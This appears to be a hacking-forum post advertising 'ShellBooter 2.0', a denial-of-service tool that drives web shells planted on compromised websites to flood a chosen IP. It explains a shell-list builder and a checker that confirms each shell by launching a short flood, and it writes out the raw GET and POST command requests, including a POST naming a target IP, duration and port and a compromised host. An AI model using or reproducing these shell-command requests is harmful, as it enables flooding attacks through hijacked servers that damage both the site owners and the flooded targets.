Code:
Heres a little run-down on ShellBooter 2.0.
first let me say this is a completly new style in ShellBooter clients as i have yet to see anybody use this technique.
as for the POST packet its alittle different as i noticed it dont send the command to the actual page your viewing but the /functions.php so remember for POSTShells to leave the trailing / at the end "ex http://website.com/" <If im wrong please let me know and i will fix this =]
ShellBooter:
As you can see i added a DataReturn so that you can also see the incoming Data sent back from the site.
.db Builder:
Nothing to explain here just takes your list of shells and inputs them into a format readable by the booter.
ShellChecker:
1.)This actually took some time and im not sure if i got it right so any errors or problems with shells you know for a fact are working just hit me up and we can try and fix this.
2.) I get tired of seeing these shellcheckers that only check it the site is up and your able to access it so i changed the verification a bit. sending a packet to a random host for a timeout of 2 seconds to make sure the shell actually works i figured would be a lot better way to check if they are actually working, This way your not filling your shell list with half-ass workig shells. shells will only be added to the working list if they consist of one of the following strings after the data has returned.
"packets complete at, packets per sec, packets, flooded, flood, averaging"
IF YOUR SHELL USES A PACKET THAT IS NOT POSTED BELOW PLEASE CONTACT ME SO I CAN ADD YOUR PACKET TO THE BOOTER.
BELOW ILL POST THE PACKETS USED TO COMMAND THE SHELLS SO YOUR BETTER EQUIPPED FOR WITCH SHELLS YOU WILL BE USING.
GETPacket:
GET http://website.com/index.php?act=phptool...&submit=Go HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://website.com/index.php
PORTPacket:
GET http://website.com/index.php?act=phptool...&submit=Go HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://website.com/index.php
POSTPacket:
POST http://website.com/function.php HTTP/1.1
Host: mupelleyolink.webcindario.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://website.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
ip=24.52.51.45&time=2&port=3057
~ |